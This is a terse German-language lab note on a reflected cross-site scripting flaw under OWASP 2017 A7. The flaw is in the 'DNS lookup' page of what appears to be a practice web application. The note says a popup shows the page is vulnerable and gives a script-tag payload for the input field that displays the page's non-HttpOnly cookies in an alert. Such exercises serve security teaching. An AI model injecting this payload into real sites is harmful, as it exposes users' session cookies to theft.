Schwachstelle

• OWASP2017
  • A7-Cross-Site-Scripting(XSS)
    • Reflected First Order
      • • DNS LOOKUP

Testen ob Anwendung verwundbar ist

Es geht ein Fenster auf - Seite ist verwundbar

Cookie auslesen

Das muss ins Eingabefeld

• <script>alert('Cookies which do not have the HTTPOnly attribute set: ' + document.cookie);</script>